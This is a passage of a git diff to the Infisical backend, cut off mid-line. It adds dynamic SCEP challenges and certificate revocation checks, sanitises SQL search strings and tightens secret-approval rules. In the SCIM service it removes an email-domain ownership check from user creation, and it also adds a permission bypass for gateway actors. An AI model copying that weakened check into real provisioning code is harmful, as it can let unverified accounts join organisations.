b/backend/src/ee/services/pki-scep/challenge/scep-challenge-types.ts new file mode 100644 index 00000000000..18fe9f5e448 --- /dev/null +++ b/backend/src/ee/services/pki-scep/challenge/scep-challenge-types.ts @@ -0,0 +1,8 @@ +export enum ScepChallengeType { + STATIC = "static", + DYNAMIC = "dynamic" +} + +export interface IScepChallengeValidator { + validate(challengePassword: string, scepConfigId: string): Promise; +} diff --git a/backend/src/ee/services/pki-scep/pki-scep-dynamic-challenge-dal.ts b/backend/src/ee/services/pki-scep/pki-scep-dynamic-challenge-dal.ts new file mode 100644 index 00000000000..5207645dd0c --- /dev/null +++ b/backend/src/ee/services/pki-scep/pki-scep-dynamic-challenge-dal.ts @@ -0,0 +1,71 @@ +import { Knex } from "knex"; + +import { TDbClient } from "@app/db"; +import { TableName } from "@app/db/schemas"; +import { DatabaseError } from "@app/lib/errors"; +import { ormify } from "@app/lib/knex"; + +export type TScepDynamicChallengeDALFactory = ReturnType; + +export const scepDynamicChallengeDALFactory = (db: TDbClient) => { + const orm = ormify(db, TableName.PkiScepDynamicChallenge); + + const consumeByHash = async (hashedChallenge: string, scepConfigId: string, tx?: Knex) => { + try { + const [result] = await (tx || db)(TableName.PkiScepDynamicChallenge) + .where({ hashedChallenge, scepConfigId }) + .where("expiresAt", ">", new Date()) + .delete() + .returning("*"); + + return result; + } catch (error) { + throw new DatabaseError({ error, name: "Consume SCEP dynamic challenge by hash" }); + } + }; + + const countPending = async (scepConfigId: string, tx?: Knex) => { + try { + const result = await (tx || db)(TableName.PkiScepDynamicChallenge) + .where({ scepConfigId }) + .where("expiresAt", ">", new Date()) + .count("id as count") + .first(); + + return Number((result as { count?: string | number })?.count ?? 0); + } catch (error) { + throw new DatabaseError({ error, name: "Count pending SCEP dynamic challenges" }); + } + }; + + const pruneExpired = async (scepConfigId: string, tx?: Knex) => { + try { + const deletedCount = await (tx || db)(TableName.PkiScepDynamicChallenge) + .where({ scepConfigId }) + .where("expiresAt", "<", new Date()) + .delete(); + + return deletedCount; + } catch (error) { + throw new DatabaseError({ error, name: "Prune expired SCEP dynamic challenges" }); + } + }; + + const deleteByConfigId = async (scepConfigId: string, tx?: Knex) => { + try { + const deletedCount = await (tx || db)(TableName.PkiScepDynamicChallenge).where({ scepConfigId }).delete(); + + return deletedCount; + } catch (error) { + throw new DatabaseError({ error, name: "Delete SCEP dynamic challenges by config" }); + } + }; + + return { + ...orm, + consumeByHash, + countPending, + pruneExpired, + deleteByConfigId + }; +}; diff --git a/backend/src/ee/services/pki-scep/pki-scep-fns.ts b/backend/src/ee/services/pki-scep/pki-scep-fns.ts index f573a3373ba..0a528147d30 100644 --- a/backend/src/ee/services/pki-scep/pki-scep-fns.ts +++ b/backend/src/ee/services/pki-scep/pki-scep-fns.ts @@ -2,7 +2,9 @@ import * as x509 from "@peculiar/x509"; import { extractX509CertFromChain } from "@app/lib/certificates/extract-certificate"; import { crypto } from "@app/lib/crypto/cryptography"; +import { TCertificateDALFactory } from "@app/services/certificate/certificate-dal"; import { isCertChainValid } from "@app/services/certificate/certificate-fns"; +import { CertStatus } from "@app/services/certificate/certificate-types"; import { TCertificateAuthorityCertDALFactory } from "@app/services/certificate-authority/certificate-authority-cert-dal"; import { TCertificateAuthorityDALFactory } from "@app/services/certificate-authority/certificate-authority-dal"; import { getCaCertChains } from "@app/services/certificate-authority/certificate-authority-fns"; @@ -59,6 +61,7 @@ export const generateRaCertificate = async ( export const isSignerCertIssuedByCa = async ({ signerCertDer, caId, + certificateDAL, certificateAuthorityCertDAL, certificateAuthorityDAL, projectDAL, @@ -66,6 +69,7 @@ export const isSignerCertIssuedByCa = async ({ }: { signerCertDer: Buffer; caId: string; + certificateDAL: Pick; certificateAuthorityCertDAL: Pick; certificateAuthorityDAL: Pick; projectDAL: Pick; @@ -96,7 +100,29 @@ export const isSignerCertIssuedByCa = async ({ }) ); - return verifiedChains.some(Boolean); + const isChainValid = verifiedChains.some(Boolean); + if (!isChainValid) { + return false; + } + + // Check if the certificate has been revoked in the database + // Use transaction to read from primary DB (not replica) since this is a security-critical check + const isRevoked = await certificateDAL.transaction(async (tx) => { + const storedCert = await certificateDAL.findOne( + { + serialNumber: signerCert.serialNumber, + caId + }, + tx + ); + return storedCert?.status === CertStatus.REVOKED; + }); + + if (isRevoked) { + return false; + } + + return true; } catch { return false; } diff --git a/backend/src/ee/services/pki-scep/pki-scep-service.ts b/backend/src/ee/services/pki-scep/pki-scep-service.ts index 4c19006425e..3b5eb89084c 100644 --- a/backend/src/ee/services/pki-scep/pki-scep-service.ts +++ b/backend/src/ee/services/pki-scep/pki-scep-service.ts @@ -1,10 +1,19 @@ +import { ForbiddenError, subject } from "@casl/ability"; import * as x509 from "@peculiar/x509"; +import { randomBytes } from "crypto"; +import { ActionProjectType } from "@app/db/schemas"; +import { TPermissionServiceFactory } from "@app/ee/services/permission/permission-service-types"; +import { + ProjectPermissionCertificateProfileActions, + ProjectPermissionSub +} from "@app/ee/services/permission/project-permission"; import { extractX509CertFromChain } from "@app/lib/certificates/extract-certificate"; import { crypto } from "@app/lib/crypto/cryptography"; import { BadRequestError, NotFoundError } from "@app/lib/errors"; import { ActorType } from "@app/services/auth/auth-type"; import { TCertificateBodyDALFactory } from "@app/services/certificate/certificate-body-dal"; +import { TCertificateDALFactory } from "@app/services/certificate/certificate-dal"; import { TCertificateAuthorityCertDALFactory } from "@app/services/certificate-authority/certificate-authority-cert-dal"; import { TCertificateAuthorityDALFactory } from "@app/services/certificate-authority/certificate-authority-dal"; import { CaType } from "@app/services/certificate-authority/certificate-authority-enums"; @@ -31,6 +40,8 @@ import { getProjectKmsCertificateKeyId } from "@app/services/project/project-fns import { EventType, TAuditLogServiceFactory } from "../audit-log/audit-log-types"; import { convertRawCertsToPkcs7 } from "../certificate-est/certificate-est-fns"; import { TLicenseServiceFactory } from "../license/license-service"; +import { getScepChallengeValidator, ScepChallengeType } from "./challenge"; +import { TScepDynamicChallengeDALFactory } from "./pki-scep-dynamic-challenge-dal"; import { getScepCapabilities, isSignerCertIssuedByCa } from "./pki-scep-fns"; import { buildCertRepFailure, buildCertRepPending, buildCertRepSuccess } from "./pki-scep-message-builder"; import { parseScepMessage } from "./pki-scep-message-parser"; @@ -38,6 +49,7 @@ import { TScepTransactionDALFactory } from "./pki-scep-transaction-dal"; import { ScepFailInfo, ScepMessageType, + TGenerateDynamicChallengeDTO, TGetCaCapsDTO, TGetCaCertDTO, THandlePkiOperationDTO, @@ -48,7 +60,9 @@ type TPkiScepServiceFactoryDep = { certificateV3Service: Pick; certificateProfileDAL: Pick; scepEnrollmentConfigDAL: Pick; + scepDynamicChallengeDAL: TScepDynamicChallengeDALFactory; scepTransactionDAL: TScepTransactionDALFactory; + certificateDAL: Pick; certificateAuthorityDAL: Pick; certificateAuthorityCertDAL: Pick; certificateRequestDAL: Pick; @@ -61,6 +75,7 @@ type TPkiScepServiceFactoryDep = { certificateRequestService: Pick; certificateIssuanceQueue: Pick; auditLogService: Pick; + permissionService: Pick; }; export type TPkiScepServiceFactory = ReturnType; @@ -71,7 +86,9 @@ export const pkiScepServiceFactory = ({ certificateV3Service, certificateProfileDAL, scepEnrollmentConfigDAL, + scepDynamicChallengeDAL, scepTransactionDAL, + certificateDAL, certificateAuthorityDAL, certificateAuthorityCertDAL, certificateRequestDAL, @@ -83,7 +100,8 @@ export const pkiScepServiceFactory = ({ certificatePolicyService, certificateRequestService, certificateIssuanceQueue, - auditLogService + auditLogService, + permissionService }: TPkiScepServiceFactoryDep) => { const loadScepContext = async (profileId: string) => { const profile = await certificateProfileDAL.findByIdWithConfigs(profileId); @@ -303,9 +321,11 @@ export const pkiScepServiceFactory = ({ } } - const isValid = challengePassword - ? await crypto.hashing().compareHash(challengePassword, scepConfig.hashedChallengePassword) - : false; + const challengeValidator = getScepChallengeValidator(scepConfig.challengeType as ScepChallengeType, { + scepEnrollmentConfigDAL, + scepDynamicChallengeDAL + }); + const isValid = await challengeValidator.validate(challengePassword, scepConfig.id); if (!isValid) { // Many SCEP clients (including sscep) send PKCSReq for both initial enrollment @@ -317,6 +337,7 @@ export const pkiScepServiceFactory = ({ const isRenewalViaPKCSReq = await isSignerCertIssuedByCa({ signerCertDer: parsed.signerCertDer, caId: profile.caId!, + certificateDAL, certificateAuthorityCertDAL, certificateAuthorityDAL, projectDAL, @@ -350,7 +371,7 @@ export const pkiScepServiceFactory = ({ profileSlug: profile.slug, transactionId: parsed.transactionId, csrSubject: csrObj.subject, - challengeType: "static" as const, + challengeType: scepConfig.challengeType as ScepChallengeType, status: "failure" as const, failReason: "Invalid challenge password", clientIp @@ -385,7 +406,7 @@ export const pkiScepServiceFactory = ({ profileSlug: profile.slug, transactionId: parsed.transactionId, csrSubject: csrObj.subject, - challengeType: "static" as const, + challengeType: scepConfig.challengeType as ScepChallengeType, clientIp }; @@ -470,6 +491,7 @@ export const pkiScepServiceFactory = ({ const isValidSigner = await isSignerCertIssuedByCa({ signerCertDer: parsed.signerCertDer, caId: profile.caId!, + certificateDAL, certificateAuthorityCertDAL, certificateAuthorityDAL, projectDAL, @@ -777,6 +799,7 @@ export const pkiScepServiceFactory = ({ switch (certRequest.status) { case CertificateRequestStatus.PENDING_APPROVAL: case CertificateRequestStatus.PENDING: + case CertificateRequestStatus.PENDING_VALIDATION: return buildCertRepPending({ raCertDer, raPrivateKeyDer, @@ -838,9 +861,98 @@ export const pkiScepServiceFactory = ({ } }; + const generateDynamicChallenge = async ({ + profileId, + actor, + actorId, + actorAuthMethod, + actorOrgId + }: TGenerateDynamicChallengeDTO) => { + const profile = await certificateProfileDAL.findByIdWithConfigs(profileId); + if (!profile || profile.enrollmentType !== EnrollmentType.SCEP) { + throw new NotFoundError({ message: "SCEP profile not found" }); + } + + const { permission } = await permissionService.getProjectPermission({ + actor, + actorId, + projectId: profile.projectId, + actorAuthMethod, + actorOrgId, + actionProjectType: ActionProjectType.CertificateManager + }); + ForbiddenError.from(permission).throwUnlessCan( + ProjectPermissionCertificateProfileActions.Edit, + subject(ProjectPermissionSub.CertificateProfiles, { slug: profile.slug }) + ); + + if (!profile.scepConfigId) { + throw new BadRequestError({ message: "SCEP enrollment not configured for this profile" }); + } + + const scepConfig = await scepEnrollmentConfigDAL.findById(profile.scepConfigId); + if (!scepConfig) { + throw new NotFoundError({ message: "SCEP configuration not found" }); + } + + if (scepConfig.challengeType !== ScepChallengeType.DYNAMIC) { + throw new BadRequestError({ message: "Dynamic challenges are not enabled for this SCEP profile" }); + } + + const project = await projectDAL.findOne({ id: profile.projectId }); + if (!project) { + throw new NotFoundError({ message: "Project not found" }); + } + + const plan = await licenseService.getPlan(project.orgId); + if (!plan.pkiScep) { + throw new BadRequestError({ + message: "Failed to generate SCEP challenge due to plan restriction. Upgrade to the Enterprise plan." + }); + } + + const challengePlaintext = randomBytes(32).toString("hex"); + + const hashedChallenge = crypto.nativeCrypto.createHash("sha256").update(challengePlaintext).digest("hex"); + + const expiryMinutes = scepConfig.dynamicChallengeExpiryMinutes ?? 60; + const maxPending = scepConfig.dynamicChallengeMaxPending ?? 100; + + const expiresAt = new Date(); + expiresAt.setMinutes(expiresAt.getMinutes() + expiryMinutes); + + await scepDynamicChallengeDAL.transaction(async (tx) => { + const pendingCount = await scepDynamicChallengeDAL.countPending(scepConfig.id, tx); + if (pendingCount >= maxPending) { + throw new BadRequestError({ + message: `Maximum number of pending challenges (${maxPending}) reached. Wait for existing challenges to expire or be used.` + }); + } + + await scepDynamicChallengeDAL.create( + { + scepConfigId: scepConfig.id, + hashedChallenge, + expiresAt + }, + tx + ); + }); + + void scepDynamicChallengeDAL.pruneExpired(scepConfig.id); + + return { + challenge: challengePlaintext, + projectId: profile.projectId, + profileSlug: profile.slug, + expiresAt: expiresAt.toISOString() + }; + }; + return { getCaCaps, getCaCert, - handlePkiOperation + handlePkiOperation, + generateDynamicChallenge }; }; diff --git a/backend/src/ee/services/pki-scep/pki-scep-types.ts b/backend/src/ee/services/pki-scep/pki-scep-types.ts index f752fb81c6a..321940dab68 100644 --- a/backend/src/ee/services/pki-scep/pki-scep-types.ts +++ b/backend/src/ee/services/pki-scep/pki-scep-types.ts @@ -1,3 +1,5 @@ +import { ActorAuthMethod, ActorType } from "@app/services/auth/auth-type"; + export enum ScepMessageType { CertRep = "3", RenewalReq = "17", @@ -63,3 +65,11 @@ export type THandlePkiOperationDTO = { message: Buffer; clientIp: string; }; + +export type TGenerateDynamicChallengeDTO = { + profileId: string; + actor: ActorType; + actorId: string; + actorAuthMethod: ActorAuthMethod; + actorOrgId: string; +}; diff --git a/backend/src/ee/services/relay/relay-service.ts b/backend/src/ee/services/relay/relay-service.ts index f1b98ba530f..4f0b9c34392 100644 --- a/backend/src/ee/services/relay/relay-service.ts +++ b/backend/src/ee/services/relay/relay-service.ts @@ -1154,16 +1154,18 @@ export const relayServiceFactory = ({ actorAuthMethod: ActorAuthMethod; actorOrgId: string; }) => { - const { permission } = await permissionService.getOrgPermission({ - scope: OrganizationActionScope.Any, - actor, - actorId, - orgId: actorOrgId, - actorAuthMethod: actorAuthMethod!, - actorOrgId - }); + if (actor !== ActorType.GATEWAY) { + const { permission } = await permissionService.getOrgPermission({ + scope: OrganizationActionScope.Any, + actor, + actorId, + orgId: actorOrgId, + actorAuthMethod: actorAuthMethod!, + actorOrgId + }); - ForbiddenError.from(permission).throwUnlessCan(OrgPermissionRelayActions.ListRelays, OrgPermissionSubjects.Relay); + ForbiddenError.from(permission).throwUnlessCan(OrgPermissionRelayActions.ListRelays, OrgPermissionSubjects.Relay); + } const instanceRelays = await relayDAL.find({ orgId: null diff --git a/backend/src/ee/services/saml-config/saml-config-service.ts b/backend/src/ee/services/saml-config/saml-config-service.ts index f6b24789c0e..3e24f0fe397 100644 --- a/backend/src/ee/services/saml-config/saml-config-service.ts +++ b/backend/src/ee/services/saml-config/saml-config-service.ts @@ -16,6 +16,8 @@ import { } from "@app/db/schemas"; import { throwOnPlanSeatLimitReached } from "@app/ee/services/license/license-fns"; import { BadRequestError, ForbiddenRequestError, NotFoundError } from "@app/lib/errors"; +import { requestMemoKeys } from "@app/lib/request-context/memo-keys"; +import { requestMemoize } from "@app/lib/request-context/request-memoizer"; import { sanitizeEmail, validateEmail } from "@app/lib/validator/validate-email"; import { TAuthLoginFactory } from "@app/services/auth/auth-login-service"; import { AuthMethod } from "@app/services/auth/auth-type"; @@ -288,7 +290,7 @@ export const samlConfigServiceFactory = ({ "Failed to create SAML SSO configuration due to plan restriction. Upgrade plan to create SSO configuration." }); - const org = await orgDAL.findOrgById(orgId); + const org = await requestMemoize(requestMemoKeys.orgFindOrgById(orgId), () => orgDAL.findOrgById(orgId)); if (!org) { throw new NotFoundError({ message: `Could not find organization with ID "${orgId}"` }); @@ -360,7 +362,7 @@ export const samlConfigServiceFactory = ({ "Failed to update SAML SSO configuration due to plan restriction. Upgrade plan to update SSO configuration." }); - const org = await orgDAL.findOrgById(orgId); + const org = await requestMemoize(requestMemoKeys.orgFindOrgById(orgId), () => orgDAL.findOrgById(orgId)); if (!org) { throw new NotFoundError({ message: `Could not find organization with ID "${orgId}"` }); @@ -532,12 +534,11 @@ export const samlConfigServiceFactory = ({ aliasType: UserAliasType.SAML }); - // Verify that the email domain (if verified on the platform) belongs to this org await verifyEmailDomainOwnership({ email, orgId, emailDomainDAL }); const sanitizedEmail = sanitizeEmail(email); validateEmail(sanitizedEmail); - const organization = await orgDAL.findOrgById(orgId); + const organization = await requestMemoize(requestMemoKeys.orgFindOrgById(orgId), () => orgDAL.findOrgById(orgId)); if (!organization) throw new NotFoundError({ message: `Organization with ID '${orgId}' not found` }); const samlConfig = await samlConfigDAL.findOne({ orgId }); @@ -727,7 +728,7 @@ export const samlConfigServiceFactory = ({ await smtpService.sendMail({ template: SmtpTemplates.EmailVerification, - subjectLine: "Infisical confirmation code", + subjectLine: `Infisical confirmation code: ${token}`, recipients: [user.email], substitutions: { code: token diff --git a/backend/src/ee/services/scim/scim-service.ts b/backend/src/ee/services/scim/scim-service.ts index 86fd94bdd93..db6c58c8f45 100644 --- a/backend/src/ee/services/scim/scim-service.ts +++ b/backend/src/ee/services/scim/scim-service.ts @@ -22,6 +22,8 @@ import { BadRequestError, NotFoundError, ScimRequestError, UnauthorizedError } f import { logger } from "@app/lib/logger"; import { ms } from "@app/lib/ms"; import { alphaNumericNanoId } from "@app/lib/nanoid"; +import { requestMemoKeys } from "@app/lib/request-context/memo-keys"; +import { requestMemoize } from "@app/lib/request-context/request-memoizer"; import { sanitizeEmail, validateEmail } from "@app/lib/validator/validate-email"; import { TAdditionalPrivilegeDALFactory } from "@app/services/additional-privilege/additional-privilege-dal"; import { AuthTokenType } from "@app/services/auth/auth-type"; @@ -288,7 +290,7 @@ export const scimServiceFactory = ({ filter, orgId }) => { - const org = await orgDAL.findById(orgId); + const org = await requestMemoize(requestMemoKeys.orgFindById(orgId), () => orgDAL.findById(orgId)); if (!org.scimEnabled) throw new ScimRequestError({ @@ -395,7 +397,7 @@ export const scimServiceFactory = ({ const sanitizedEmail = sanitizeEmail(email); validateEmail(sanitizedEmail); - const org = await orgDAL.findOrgById(orgId); + const org = await requestMemoize(requestMemoKeys.orgFindOrgById(orgId), () => orgDAL.findOrgById(orgId)); if (!org) throw new ScimRequestError({ detail: "Organization not found", @@ -424,8 +426,6 @@ export const scimServiceFactory = ({ aliasType }); - // Verify that the email domain (if verified on the platform) belongs to this org - await verifyEmailDomainOwnership({ email, orgId, emailDomainDAL }); const { user: createdUser, orgMembership: createdOrgMembership } = await userDAL.transaction(async (tx) => { @@ -575,7 +575,7 @@ export const scimServiceFactory = ({ // partial const updateScimUser: TScimServiceFactory["updateScimUser"] = async ({ orgMembershipId, orgId, operations }) => { - const org = await orgDAL.findOrgById(orgId); + const org = await requestMemoize(requestMemoKeys.orgFindOrgById(orgId), () => orgDAL.findOrgById(orgId)); if (!org.orgAuthMethod) { throw new ScimRequestError({ detail: "Neither SAML or OIDC SSO is configured", @@ -697,7 +697,7 @@ export const scimServiceFactory = ({ email: unsanitizedEmail, externalId }) => { - const org = await orgDAL.findOrgById(orgId); + const org = await requestMemoize(requestMemoKeys.orgFindOrgById(orgId), () => orgDAL.findOrgById(orgId)); if (!org.orgAuthMethod) { throw new ScimRequestError({ detail: "Neither SAML or OIDC SSO is configured", @@ -869,7 +869,7 @@ export const scimServiceFactory = ({ message: "Failed to list SCIM groups due to plan restriction. Upgrade plan to list SCIM groups." }); - const org = await orgDAL.findById(orgId); + const org = await requestMemoize(requestMemoKeys.orgFindById(orgId), () => orgDAL.findById(orgId)); if (!org) { throw new ScimRequestError({ detail: "Organization Not Found", @@ -885,8 +885,8 @@ export const scimServiceFactory = ({ const groups = await groupDAL.findGroups( { - orgId, - ...(filter && parseScimFilter(filter)) + ...(filter && parseScimFilter(filter)), + orgId }, { offset: startIndex - 1, @@ -987,7 +987,7 @@ export const scimServiceFactory = ({ message: "Failed to create a SCIM group due to plan restriction. Upgrade plan to create a SCIM group." }); - const org = await orgDAL.findById(orgId); + const org = await requestMemoize(requestMemoKeys.orgFindById(orgId), () => orgDAL.findById(orgId)); if (!org) { throw new ScimRequestError({ @@ -1285,7 +1285,7 @@ export const scimServiceFactory = ({ message: "Failed to update SCIM group due to plan restriction. Upgrade plan to update SCIM group." }); - const org = await orgDAL.findById(orgId); + const org = await requestMemoize(requestMemoKeys.orgFindById(orgId), () => orgDAL.findById(orgId)); if (!org) { throw new ScimRequestError({ detail: "Organization Not Found", @@ -1326,7 +1326,7 @@ export const scimServiceFactory = ({ message: "Failed to update SCIM group due to plan restriction. Upgrade plan to update SCIM group." }); - const org = await orgDAL.findById(orgId); + const org = await requestMemoize(requestMemoKeys.orgFindById(orgId), () => orgDAL.findById(orgId)); if (!org) { throw new ScimRequestError({ @@ -1394,7 +1394,7 @@ export const scimServiceFactory = ({ message: "Failed to delete SCIM group due to plan restriction. Upgrade plan to delete SCIM group." }); - const org = await orgDAL.findById(orgId); + const org = await requestMemoize(requestMemoKeys.orgFindById(orgId), () => orgDAL.findById(orgId)); if (!org) { throw new ScimRequestError({ detail: "Organization Not Found", diff --git a/backend/src/ee/services/secret-approval-request/secret-approval-request-dal.ts b/backend/src/ee/services/secret-approval-request/secret-approval-request-dal.ts index 4558458a2c7..44d0fc92517 100644 --- a/backend/src/ee/services/secret-approval-request/secret-approval-request-dal.ts +++ b/backend/src/ee/services/secret-approval-request/secret-approval-request-dal.ts @@ -12,6 +12,7 @@ import { TUsers } from "@app/db/schemas"; import { DatabaseError } from "@app/lib/errors"; +import { sanitizeSqlLikeString } from "@app/lib/fn"; import { ormify, selectAllTableCols, sqlNestRelationships, stripUndefinedInWhere, TFindFilter } from "@app/lib/knex"; import { RequestState } from "./secret-approval-request-types"; @@ -537,13 +538,19 @@ export const secretApprovalRequestDALFactory = (db: TDbClient) => { .whereRaw(`CONCAT_WS(' ', ??, ??) ilike ?`, [ db.ref("firstName").withSchema("committerUser"), db.ref("lastName").withSchema("committerUser"), - `%${search}%` + `%${sanitizeSqlLikeString(search)}%` ]) - .orWhereRaw(`?? ilike ?`, [db.ref("username").withSchema("committerUser"), `%${search}%`]) - .orWhereRaw(`?? ilike ?`, [db.ref("email").withSchema("committerUser"), `%${search}%`]) - .orWhereILike(`${TableName.Environment}.name`, `%${search}%`) - .orWhereILike(`${TableName.Environment}.slug`, `%${search}%`) - .orWhereILike(`${TableName.SecretApprovalPolicy}.secretPath`, `%${search}%`); + .orWhereRaw(`?? ilike ?`, [ + db.ref("username").withSchema("committerUser"), + `%${sanitizeSqlLikeString(search)}%` + ]) + .orWhereRaw(`?? ilike ?`, [ + db.ref("email").withSchema("committerUser"), + `%${sanitizeSqlLikeString(search)}%` + ]) + .orWhereILike(`${TableName.Environment}.name`, `%${sanitizeSqlLikeString(search)}%`) + .orWhereILike(`${TableName.Environment}.slug`, `%${sanitizeSqlLikeString(search)}%`) + .orWhereILike(`${TableName.SecretApprovalPolicy}.secretPath`, `%${sanitizeSqlLikeString(search)}%`); }); } @@ -739,15 +746,15 @@ export const secretApprovalRequestDALFactory = (db: TDbClient) => { .whereRaw(`CONCAT_WS(' ', ??, ??) ilike ?`, [ db.ref("committerUserFirstName"), db.ref("committerUserLastName"), - `%${search}%` + `%${sanitizeSqlLikeString(search)}%` ]) - .orWhereRaw(`?? ilike ?`, [db.ref("committerUserUsername"), `%${search}%`]) - .orWhereRaw(`?? ilike ?`, [db.ref("committerUserEmail"), `%${search}%`]) - .orWhereILike(`environmentName`, `%${search}%`) - .orWhereILike(`environment`, `%${search}%`) - .orWhereILike(`policySecretPath`, `%${search}%`) - .orWhereILike(`requestFolderPath`, `%${search}%`) - .orWhereILike(`secretKey`, `%${search}%`); + .orWhereRaw(`?? ilike ?`, [db.ref("committerUserUsername"), `%${sanitizeSqlLikeString(search)}%`]) + .orWhereRaw(`?? ilike ?`, [db.ref("committerUserEmail"), `%${sanitizeSqlLikeString(search)}%`]) + .orWhereILike(`environmentName`, `%${sanitizeSqlLikeString(search)}%`) + .orWhereILike(`environment`, `%${sanitizeSqlLikeString(search)}%`) + .orWhereILike(`policySecretPath`, `%${sanitizeSqlLikeString(search)}%`) + .orWhereILike(`requestFolderPath`, `%${sanitizeSqlLikeString(search)}%`) + .orWhereILike(`secretKey`, `%${sanitizeSqlLikeString(search)}%`); }); } diff --git a/backend/src/ee/services/secret-approval-request/secret-approval-request-fns.ts b/backend/src/ee/services/secret-approval-request/secret-approval-request-fns.ts index c169fad5e0c..211ef029849 100644 --- a/backend/src/ee/services/secret-approval-request/secret-approval-request-fns.ts +++ b/backend/src/ee/services/secret-approval-request/secret-approval-request-fns.ts @@ -37,7 +37,7 @@ export const sendApprovalEmailsFn = async ({ type: NotificationType.SECRET_CHANGE_REQUEST, title: "Secret Change Request", body: `You have a new secret change request pending your review for the project **${project.name}** in the organization **${project.organization.name}**.`, - link: `/organizations/${project.orgId}/projects/secret-management/${project.id}/approval` + link: `/organizations/${project.orgId}/projects/secret-management/${project.id}/approval?requestId=${secretApprovalRequest.id}` })) ); @@ -51,7 +51,7 @@ export const sendApprovalEmailsFn = async ({ firstName: reviewerUser.firstName, projectName: project.name, organizationName: project.organization.name, - approvalUrl: `${cfg.SITE_URL}/organizations/${project.orgId}/projects/secret-management/${project.id}/approval` + approvalUrl: `${cfg.SITE_URL}/organizations/${project.orgId}/projects/secret-management/${project.id}/approval?requestId=${secretApprovalRequest.id}` }, template: SmtpTemplates.SecretApprovalRequestNeedsReview }); diff --git a/backend/src/ee/services/secret-approval-request/secret-approval-request-service.ts b/backend/src/ee/services/secret-approval-request/secret-approval-request-service.ts index bc40ea8db56..7ba9465372b 100644 --- a/backend/src/ee/services/secret-approval-request/secret-approval-request-service.ts +++ b/backend/src/ee/services/secret-approval-request/secret-approval-request-service.ts @@ -20,6 +20,8 @@ import { BadRequestError, ForbiddenRequestError, NotFoundError } from "@app/lib/ import { groupBy, pick, unique } from "@app/lib/fn"; import { setKnexStringValue } from "@app/lib/knex"; import { alphaNumericNanoId } from "@app/lib/nanoid"; +import { requestMemoKeys } from "@app/lib/request-context/memo-keys"; +import { requestMemoize } from "@app/lib/request-context/request-memoizer"; import { EnforcementLevel } from "@app/lib/types"; import { triggerWorkflowIntegrationNotification } from "@app/lib/workflow-integrations/trigger-notification"; import { TriggerFeature } from "@app/lib/workflow-integrations/types"; @@ -479,12 +481,6 @@ export const secretApprovalRequestServiceFactory = ({ actorAuthMethod, actorOrgId }: TReviewRequestDTO) => { - const secretApprovalRequest = await secretApprovalRequestDAL.findById(approvalId); - if (!secretApprovalRequest) { - throw new NotFoundError({ message: `Secret approval request with ID '${approvalId}' not found` }); - } - if (actor !== ActorType.USER) throw new BadRequestError({ message: "Must be a user" }); - const plan = await licenseService.getPlan(actorOrgId); if (!plan.secretApproval) { throw new BadRequestError({ @@ -493,6 +489,15 @@ export const secretApprovalRequestServiceFactory = ({ }); } + const secretApprovalRequest = await secretApprovalRequestDAL.findById(approvalId); + if (!secretApprovalRequest) { + throw new NotFoundError({ message: `Secret approval request with ID '${approvalId}' not found` }); + } + if (actor !== ActorType.USER) throw new BadRequestError({ message: "Must be a user" }); + + if (secretApprovalRequest.status !== RequestState.Open) + throw new BadRequestError({ message: "You can only review open approval requests" }); + const { policy } = secretApprovalRequest; if (policy.deletedAt) { throw new BadRequestError({ @@ -637,6 +642,10 @@ export const secretApprovalRequestServiceFactory = ({ }); } + if (secretApprovalRequest.hasMerged) throw new BadRequestError({ message: "Approval request has been merged" }); + if (secretApprovalRequest.status !== RequestState.Open) + throw new BadRequestError({ message: "You can only approve or reject open approval requests" }); + const { hasRole } = await permissionService.getProjectPermission({ actor: ActorType.USER, actorId, @@ -708,21 +717,27 @@ export const secretApprovalRequestServiceFactory = ({ if (secretUpdationCommits.length) { const secrets = await secretV2BridgeDAL.findBySecretKeys( folderId, - secretCreationCommits.map((el) => ({ + secretUpdationCommits.map((el) => ({ key: el.key, type: SecretType.Shared })) ); - const updationConflictSecretsGroupByKey = groupBy(secrets, (i) => i.key); + const updationSecretsGroupByKey = groupBy(secrets, (i) => i.key); secretUpdationCommits - .filter(({ key, secretId }) => updationConflictSecretsGroupByKey[key] || !secretId) + .filter(({ key, secretId }) => { + const dbSecret = updationSecretsGroupByKey[key]?.[0]; + // Conflict if: secret doesn't exist OR secretId doesn't match (was recreated) OR no secretId in commit + return !dbSecret || dbSecret.id !== secretId || !secretId; + }) .forEach((el) => { conflicts.push({ op: SecretOperations.Update, secretId: el.id }); }); - secretUpdationCommits = secretUpdationCommits.filter( - ({ key, secretId }) => Boolean(secretId) && !updationConflictSecretsGroupByKey[key] - ); + secretUpdationCommits = secretUpdationCommits.filter(({ key, secretId }) => { + const dbSecret = updationSecretsGroupByKey[key]?.[0]; + // Valid if: secret exists AND secretId matches AND has secretId + return dbSecret && dbSecret.id === secretId && Boolean(secretId); + }); } const secretDeletionCommits = secretApprovalSecrets.filter(({ op }) => op === SecretOperations.Delete); @@ -1630,7 +1645,9 @@ export const secretApprovalRequestServiceFactory = ({ const cfg = getConfig(); const approvalUrl = `${cfg.SITE_URL}${approvalPath}?requestId=${secretApprovalRequest.id}`; - const project = await projectDAL.findById(projectId); + const project = await requestMemoize(requestMemoKeys.projectFindById(projectId), () => + projectDAL.findById(projectId) + ); await triggerWorkflowIntegrationNotification({ input: { projectId, diff --git a/backend/src/ee/services/secret-replication/secret-replication-service.ts b/backend/src/ee/services/secret-replication/secret-replication-service.ts index 21a56343a02..8e7212597d7 100644 --- a/backend/src/ee/services/secret-replication/secret-replication-service.ts +++ b/backend/src/ee/services/secret-replication/secret-replication-service.ts @@ -2,7 +2,7 @@ import { SecretType, TSecrets, TSecretsV2 } from "@app/db/schemas"; import { TSecretApprovalPolicyServiceFactory } from "@app/ee/services/secret-approval-policy/secret-approval-policy-service"; import { TSecretApprovalRequestDALFactory } from "@app/ee/services/secret-approval-request/secret-approval-request-dal"; import { TSecretApprovalRequestSecretDALFactory } from "@app/ee/services/secret-approval-request/secret-approval-request-secret-dal"; -import { KeyStorePrefixes, TKeyStoreFactory } from "@app/keystore/keystore"; +import { KeyStorePrefixes, KeyStoreTtls, TKeyStoreFactory } from "@app/keystore/keystore"; import { crypto, SymmetricKeySize } from "@app/lib/crypto/cryptography"; import { NotFoundError } from "@app/lib/errors"; import { groupBy, unique } from "@app/lib/fn"; @@ -93,7 +93,6 @@ type TSecretReplicationServiceFactoryDep = { }; export type TSecretReplicationServiceFactory = ReturnType; -const SECRET_IMPORT_SUCCESS_LOCK = 10; const keystoreReplicationSuccessKey = (jobId: string, secretImportId: string) => `${jobId}-${secretImportId}`; const getReplicationKeyLockPrefix = (projectId: string, environmentSlug: 